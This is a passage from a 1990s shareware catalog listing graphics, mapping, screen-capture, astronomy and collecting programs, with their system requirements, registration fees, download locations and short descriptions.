508 + + + + 14.6.2 Mapping/cartography + + See also: Data, Mapping data; Engineering, Surveying & + cartography. + + Product: Landscape Explorer + Author: , 0786-825406 + Version: 3.01 (01-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $65.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of phone, CompuServe, mail support; bonus utilities; + bonus data; bonus templates; all ASP-wide offers (see page 5); + discounts on upgrades. + Look for: availability unknown on BBSs; LAND*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 100332,2104 + for assistance). + SWREG#: 2099 + PsL#: 11239 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A 3D landscape viewer/GIS application for Windows. Can import + data from digital files or scanned map images to create 3D + models of landscape surfaces. These can be viewed from any + position and drawn in many different schemes such as Summer and + Winter colours, GIS data mapping and wire frame. Supports USGS + DEM 7.5' and UK OS NTF LandRanger file formats. + + + Product: MapDraw + Deed plotter, map drawing (metes and bound. See full + description on page 362. + + Product: MAPIT + Author: , 412-727-2198 + Version: 1.4 (04-15-94) + Needs: IBM AT (80286), DOS 3.3 or better. 512k RAM; EGA monitor; + Hard disk; Mouse; EMS memory. + Strongly recommended: VGA monitor; HP LaserJet printer; + Plotter; XMS memory; math coprocessor. + Registration fee: $39.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, CompuServe, mail support; royalty-free runtime + license; + Look for: MAPIT14*.* on BBSs (multiple files); MAPIT*.* on + CompuServe in CIS:PCAPP forum LIBrary 7 (multiple files) (or + contact userID 72600,1200 for assistance). + Download size: 912k (about 68 minutes with a 2400 baud modem) + Description: + An integrated world mapping system of amazing detail which lets + you create customized maps for work, shool, or fun. + + Chapter 14, "Graphics" 509 + + + + * print detailed, professional-quality customized maps + * merge maps with word processing documents + * record and plot GPS data + * add your own detail with 100 foot precission + * measure distances, calculate azimuth angles, and plot + great circles and range curves with areas + * see the day and time anywhere in the world + * zoom to any level of detail + + + Product: TommySoftware Tek Illustrator + Most powerful graphics application. See full description on + page 490. + + Product: VERSAMAP + Author: , 302-731-0694 + Version: 1.40 (06-14-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $15.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; bonus fonts. + Look for: VMAP140.ZIP on BBSs (call 916-327-1208 to download it + at no charge); VMAP14.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70511,3134 for assistance). + Download size: 321k (about 24 minutes with a 2400 baud modem) + Description: + Draw outline maps on 13 map projections. Print maps on + printer; or as PCX, PIC, CGM, ASCII files. Add text to maps. + Contains new countries formed from USSR, Australian States, + Canadian Provinces. Plot World Data Bank II and USGS Digital + LIne Graph data. Plot Great Circles, report course and + distance at waypoints along Great Circle, plot maps in 16 + colors, select background and grid colors. + + + 14.7 Ready-made graphic images + + See also: Data, Mapping data. + + Chapter 14, "Graphics" 510 + + + + 14.7.1 BMP images + + Product: Kid's Art + Author: + Version: 1.1 (09-20-94) + Needs: IBM PC, DOS 2.11 or better. Ability to display or print + BMP images. + Strongly recommended: VGA monitor. + Registration fee: $0.00 + Registration benefits: + Look for: KDSART11.ZIP on BBSs; KDSART.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Twenty children's drawings converted to graphics files. BMP + format (16-color bitmapped) suitable for WIndows wallpaper and + other BMP uses. Not great art, but childlike, could be fun. + Best in color. + + + 14.7.2 PCX images + + Product: Kid's Art + Children's artwork. See full description on page 510. + + 14.7.3 WPG images + + Product: Graphcat/DOS Clip Art Cataloger + Clip art cataloger for WordPerfect 6.0/5.1. See full + description on page 224. + + Product: Graphcat/Win Clip Art Cataloger + Graphcat clip art cataloger for WPWin61/52. See full + description on page 224. + + 14.7.4 For adults only + + Product: Swimsuit + Author: , 206-523-6135 + Version: 1.1 (09-15-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support; bonus utilities; bonus data; + bonus graphics; all ASP-wide offers (see page 5); disks of + + Chapter 14, "Graphics" 511 + + + + other shareware; discounts on other products; discounts on + upgrades. + Look for: availability unknown on BBSs; SWIM.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + SWREG#: 7564 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Lovely women pose for glamour photographer Len Kaltman and now + his best images are available as Winzle puzzles. Extremely + flexible: Save puzzles, solution hints, music, sound effects, + simple mouse interface, and much more! + + This version contains no nudity. Registered version does + contain nudity, and is available only to adults 18 and over. + + Supports any windows graphics mode, adapting as you switch + displays. + + + 14.7.5 Other formats + + Product: Crowndale Tales : ESCAPE! + Multimedia fable. See full description on page 617. + + Product: RISS Icon Pak + RISS Icon Pak: 2001 Icons, plus Icon Viewer! See full + description on page 485. + + + 14.8 Utilities + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 363. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 92. + + Product: RISS Icon Pak + RISS Icon Pak: 2001 Icons, plus Icon Viewer! See full + description on page 485. + + 14.8.1 Cataloging tools + + See also: Utilities, File utilities, File sorting & conversion. + + Product: 4EDIT + File description editor for 4DOS. See full description on + page 180. + + Chapter 14, "Graphics" 512 + + + + Product: Graphcat/DOS Clip Art Cataloger + Clip art cataloger for WordPerfect 6.0/5.1. See full + description on page 224. + + Product: Graphcat/Win Clip Art Cataloger + Graphcat clip art cataloger for WPWin61/52. See full + description on page 224. + + Product: Jasc Media Center [***] + Author: , 612-930-9171 + Version: 2.02 (07-13-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk. + Strongly recommended: Mouse; sound card. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; bonus graphics; discounts on upgrades. + Look for: MC202.ZIP on BBSs (call 612-930-3516 to download it at + no charge); MC.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + SWREG#: 4493 + Download size: 875k (about 65 minutes with a 2400 baud modem) + Description: + A Windows program for multimedia file management and + manipulation. Organize your multimedia files into albums of + thumbnails. Catalog, search, sort by keyword, comment, or file + properties. View files using the powerful slide show feature. + Full file manipulation capabilities from within the program. + Print high quality contact sheets. Support for over 35 file + formats, removable disks, and CD Roms. + + + 14.8.2 Graphic screen capture + + See also: Utilities, Hardware utilities, Screen, Screen + capture. + + Product: Capbuf + TSR captures text screens to disk. See full description on + page 71. + + Product: ClipMate for Windows + Clipboard utility - holds multiple items. See full description + on page 175. + + Product: The DemoMaker + Creates demos/slide shows for any DOS program. See full + description on page 426. + + Chapter 14, "Graphics" 513 + + + + Product: Paint Shop + Image displayer, converter, editor. scrn cap. See full + description on page 484. + + Product: Paint Shop Pro [***] + Complete painting image creation editing tool. See full + description on page 492. + + Product: Professional Capture Systems + Author: , 612-930-9171 + Version: 2.0 (01-26-95) + Needs: IBM AT (80286), DOS 3.3 or better. VGA monitor; Hard + disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; discounts on upgrades. + Look for: PCS20.ZIP on BBSs (call 612-930-3516 to download it at + no charge); PCS.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + A combination of both Windows and DOS programs that will + simplify screen capturing. The Windows program allows for the + capturing a defined area, full screen, window, or client area. + Captures can be sent to the clipboard, printer and disk. + Numerous image formats supported. The DOS program will capture + standard and extended VGA text modes and standard VGA graphics + modes. Captures are saved to PCX or BMP files. + + + Product: WinCap+ + Author: + Version: 1.00 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; all ASP-wide offers (see page 5). + Look for: WCP*.ZIP on BBSs; WCP.ZIP on CompuServe in CIS:DTPFORUM + forum LIBrary 0 (or contact userID 100571,3124 for assistance). + SWREG#: 4939 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A powerful bitmap viewer/printer/capture utility for Windows + (3.1). Capture a complete window, or any part of a window, then + print, save or copy it to the clipboard. Capture using a hot- + key or by pointing and clicking. Capture dropped down sub-menus + & combo/list boxes, zoom images, 16 and 256 colour supported. + An ideal tool for anyone preparing any kind of documentation + that requires an image of a window. Detailed on-line help is + provided. + + Chapter 14, "Graphics" 514 + + + + 14.8.3 Graphic print screen + + See also: Utilities, Printer utilities. + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 72. + + Product: WinCap+ + Powerful Windows(3.1) screen capture utility. See full + description on page 513. + + 14.8.4 File format translators + + Product: The Complete Image + New image processor for big jobs/animations. See full + description on page 504. + + Product: The Complete Morph + Full featured morphing facility for spec. F/X. See full + description on page 498. + + Product: FF Graphics Conversion Utility + Author: , 407-951-2268 + Version: 1.1 (12-20-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: FFGCU.ZIP on BBSs; FFGCU.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 41k (about three minutes with a 2400 baud modem) + Description: + Allows you to convert and metafiles and icon images into bitmap + format, suitable for use with any program that can read bitmap + images. Also allows you to scale metafiles to smaller and + larger sizes. Many of today's graphic images are sold and + distributed in Windows metafile formats, making it impossible + to use the images in programs that require bitmap images. This + solves the problem! + + + Product: Image'n'Bits + Image enhancement program for Windows. See full description on + page 484. + + Product: Jasc Media Center [***] + Multimedia file cataloging. See full description on page 512. + + Product: Paint Shop + Image displayer, converter, editor. scrn cap. See full + description on page 484. + + Chapter 14, "Graphics" 515 + + + + Product: Paint Shop Pro [***] + Complete painting image creation editing tool. See full + description on page 492. + + Product: PrintGL + Pen plotter emulator package. See full description on page 78. + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 72. + + + 14.9 Software tools & add-ins + + 14.9.1 For multiple programs + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 429. + + 14.9.2 For AutoCAD + + Product: REALIZE + Full converter from .DXF to POV raytracer. See full + description on page 504. + + Product: TommySoftware CAD/DRAW 4 Level1 + The 32bit verison of the CAD shareware stand. See full + description on page 490. + + 14.9.3 For other + + Product: FontMe! + Author: , 714-898-7262 + Version: 2.5 (10-29-93) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Registration fee: $20.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FONTME.ZIP on BBSs; FONTME.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 70233,1315 for + assistance). + Download size: 322k (about 24 minutes with a 2400 baud modem) + Description: + A comparison and printing program for those who have more + windows fonts than they know what to do with! Lets you compare + two fonts on screen, changing styles and size. Also print the + fonts for a more detailed comparison (side by side letters). + Print a complete list or book of your fonts. Compare two + similar fonts and place one on the delete list for later + + Chapter 14, "Graphics" 516 + + + + removal (tells you where the font is and what name it has on + your hard disk). Too many features to list here. + + Chapter 15, "Home & hobby" 517 + + + + + + Chapter 15 + Home & hobby + + See also: Finances, Personal finances; Business, Work-at-home. + + + 15.1 Arts & crafts + + Product: PhotoPat + Author: , 404-642-7515 + Version: 1.5 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor. + Registration fee: $22.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; bonus data; bonus graphics; all + ASP-wide offers (see page 5); discounts on other products. + 12-month free upgrading allowed. + Look for: availability unknown on BBSs; PHOTOP.ZIP on CompuServe + in CIS:CRAFTS forum LIBrary 14 (or contact userID 75027,3674 + for assistance). + Download size: 760k (about 57 minutes with a 2400 baud modem) + Description: + A truly unique Windows image processing package. Bitmap images + are read in (or transfered via the Clipboard) and then + converted into photo-realistic "color-by-number" patterns. A + sophisticated algorithm is used to optimally select pixels into + appropriate color-balanced pieces. Other features include + control of the number and density of pieces, user defineable + palettes (up to 240 colors), poster size output, HPGL and DXF + pattern output, and several image processing functions. + + Chapter 15, "Home & hobby" 518 + + + + Product: Quilt + Author: , 206-523-6135 + Version: 1.32 (04-09-92) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; QUILT.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + SWREG#: 322 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A diverting graphics program or nonresident screen saver, using + half square quilting patterns. You can create specific + patterns or set the program to continuously change patterns. + Change widths, patterns, rotate or flip the designs, or colors + for "billions and billions" of combinations. Configurable color + palettes (v1.1 lets you set 8 colors at a time) chosen from 64 + possible colors. Ages 8 to 88. + + + 15.2 Astronomy + + Product: CircumSpace + Author: + Version: 1.0 (09-06-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. + Look for: CIRCUM10.ZIP on BBSs (call 517-695-9952 to download it + at no charge); CIRCUM.ZIP on CompuServe in CIS:ASTROFORUM forum + LIBrary 7 (or contact userID 76207,3377 for assistance); + CIRCUM10.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID M.HANEY3 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Displays the sky as it would actually appear from anywhere + within several hundred light years of the Earth. Fast, fun, and + easy to use, it lets the user travel to any of 7,780 nearby + stars with the click of the mouse, or choose the nifty warping + mode to smoothly animate the voyage. Learn where the Sun would + appear in the sky of your favorite star, and how bright (or + + Chapter 15, "Home & hobby" 519 + + + + dim!) it would be. See how the familiar patterns change as you + journey. + + + Product: clySmic Lunar Almanack + Author: , 518-438-5548 + Version: 2.00 (01-24-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $9.95 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; LUNA.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 76156,164 for + assistance). + Download size: 346k (about 26 minutes with a 2400 baud modem) + Description: + Displays the current moon phase; rising, southing, and setting + times, the constellation & signe of the moon, and more. Easy to + use, with beautiful, colorful graphical display with moon icons + and scanned bitmaps. Can be run as an icon displaying the moon + phase only. Takes advantage of >16-color displays if present. + + + Product: SkyGlobe + Author: + Version: 3.6 (10-15-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Modem; Mouse. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of fax, + CompuServe, mail support; bonus utilities; discounts on other + products; discounts on upgrades. + Look for: SKYGL036.ZIP on BBSs (call 517-631-3471 to download it + at no charge); SKYGLB.ZIP on CompuServe in CIS:ASTROFORUM forum + LIBrary 7 (or contact userID 76207,3377 for assistance); + SKYGLO36.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID M.HANEY3 for assistance). + Download size: 362k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1992 winner, Shareware Industry Awards. + 1990 winner, Public Brand Software contests for useful + programs. + Description: + The award-winning planetarium that is fast, fun, and easy. A + fixture on the Shareware Top Ten, it is the fastest program of + its kind, and it provides a realistic and beautiful display of + the spendor of the heavens. You can instantly change your + computer view of the cosmos, or use one of the many animation + modes to simulate celestial motion. Use it to plan a night's + viewing, teach yourself about the universe around us, or just + to show off the graphics of your computer. + + Chapter 15, "Home & hobby" 520 + + + + Product: SkyMap + Author: , 612-322-5868 + Version: 2.1 (07-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: math coprocessor. + Registration fee: $36.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + lifetime limited return policy; bonus data; all ASP-wide offers + (see page 5); discounts on upgrades. + Look for: SKYMP*.ZIP on BBSs (multiple files); SKYMP*.ZIP on + CompuServe in CIS:ASTROFORUM forum LIBrary 7 (multiple files) + (or contact userID 100113,1140 for assistance). + SWREG#: 876 + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + A highly accurate "Planetarium" for Windows 3.1 or better. It + can display a map of the sky, as seen from anywhere on Earth, + for any date between 4000BC and 8000AD. The program can display + stars, planets, comets, and "deep sky" objects such as star + clusters, nebulae and galaxies. Extensive information about any + object on the map can be obtained simply by clicking on it, and + pictures can be displayed. High-quality maps can be printed on + any printer supported by Windows. + + + 15.3 Computers + + See also: Education, Computers. + + Product: CD-ROM Guide + Author: , 303-641-5035 + Version: 1.1 (02-04-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; VGA monitor; Hard + disk. + Registration fee: $29.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; bonus + utilities; bonus data; bonus graphics; all ASP-wide offers (see + page 5). + Look for: availability unknown on BBSs. + Download size: 505k (about 38 minutes with a 2400 baud modem) + Description: + A directory of CD-ROM titles for DOS and Windows. Includes + title name, system requirements, description, price, and + publisher contact information (including 800 number & FAX). A + useful way to locate exciting and unusual CD-ROMs - because + many titles can only be obtained directly from the publisher, + not from dealers or catalogs. 50 Topic categories for easy + access, plus actual CD-ROM screen shots and multimedia tips. + + Chapter 15, "Home & hobby" 521 + + + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 233. + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 494. + + Product: Palette Adjuster + Adjusts the colors on your VGA monitor. See full description + on page 66. + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 392. + + + 15.4 Collecting + + Product: AlbumMaster + Author: , 816-429-3558 + Version: 8.50 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: ALBM850.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ALMSTR.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 76 + Download size: 261k (about 20 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, album + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete tune listing! + + Chapter 15, "Home & hobby" 522 + + + + Product: AlbumMaster For Windows + Author: , 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $33.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus graphics; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ALBMW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ALBMW.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 2511 + Download size: 882k (about 66 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, album + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete tune listing! + + + Product: The Book Collector (New & Rare) + Author: , 714-898-7262 + Version: 1.5 (10-29-93) + Needs: IBM AT (80286), DOS 3.3 or better. Hard disk. + Registration fee: $59.95 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; bonus utilities; discounts on + other products. + Look for: FGSTBC.ZIP on BBSs; FGSTBC.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (or contact userID 70233,1315 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + For book collectors large or small. Keeps library location, + value, condition, date published, pages, ISBN#, subject, + author, title and lots of room for comments. Update the value + of your book as time goes on and the value increases. Also + includes a scetion to keep track of the books you would like to + add to your collection some day. Print this list when you + attend auctions, shows or conventions. You can also keep the + dealers you have had contact with and rate them. Lots of print + routines. + + Chapter 15, "Home & hobby" 523 + + + + Product: Book Librarian + Book cataloging program. See full description on page 459. + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 233. + + Product: CassetteMaster + Author: , 816-429-3558 + Version: 9.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CASM910.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTR.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 77 + Download size: 261k (about 20 minutes with a 2400 baud modem) + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, tape + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a tune list! + + + Product: CassetteMaster For Windows + Author: , 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + + Chapter 15, "Home & hobby" 524 + + + + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CASW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTRW.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 3697 + Download size: 872k (about 65 minutes with a 2400 baud modem) + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, tape + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a tune list! + + + Product: CDMaster + Author: , 816-429-3558 + Version: 8.60 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics or + Laser printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CDM860.ZIP on BBSs (call 317-784-2147 to download it at + no charge); CDMSTR.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 7 (or contact userID 70272,3317 for assistance). + SWREG#: 78 + Download size: 341k (about 26 minutes with a 2400 baud modem) + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and powerful. Standard entries for title, + artist, CD number, category, and tunes (plus 3 user defined + fields! The user can obtain printouts for criteria or all, and + can search for all fields or combination, even tunes! Printouts + include: an abbreviated listing, full catalog, a custom + lisiting, 3X5 and Rolodex cards, front labels, and a complete + tune list! + + + Product: CDMaster For Windows + The BeZT CD library ever! See full description on page 559. + + Chapter 15, "Home & hobby" 525 + + + + Product: CDPlayer for Windows and DOS + Audio CD playing and cataloging program. See full description + on page 560. + + Product: Household Register + Author: , 404-516-8575 + Version: 3.12 (12-27-93) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie + support. + Look for: HR312.ZIP on BBSs (call 703-680-9269 to download it at + no charge); HR.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); HR312.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 183k (about 14 minutes with a 2400 baud modem) + Description: + Excellent easy-to-use menu-driven home/office inventory program + holds upto 99,999 items and can use an unlimited number of + databases. Includes complete database management functions and + full featured report printing. Lists reports to screen, + printer or disk. A valuation report prints your inventory and a + summary of total items by category, location or owner. Features + pop-up pick lists; on-line help; warranty lists showing + warranty expiration dates, a sample database and much more. + + + Product: MCBase + Author: , NL-(0)74-2668480 + Version: 2.0 (08-06-95) + Needs: IBM PC, DOS 3.0 or better. 590k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse; Epson printer; EMS + memory; XMS memory; math coprocessor. + Registration fee: $47.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited fax, CompuServe, + newsletter, mail support; bonus utilities; discounts on other + + Chapter 15, "Home & hobby" 526 + + + + products; discounts on upgrades; registration commissions. + 6-month free upgrading allowed. + Look for: MCB20.ZIP on BBSs; 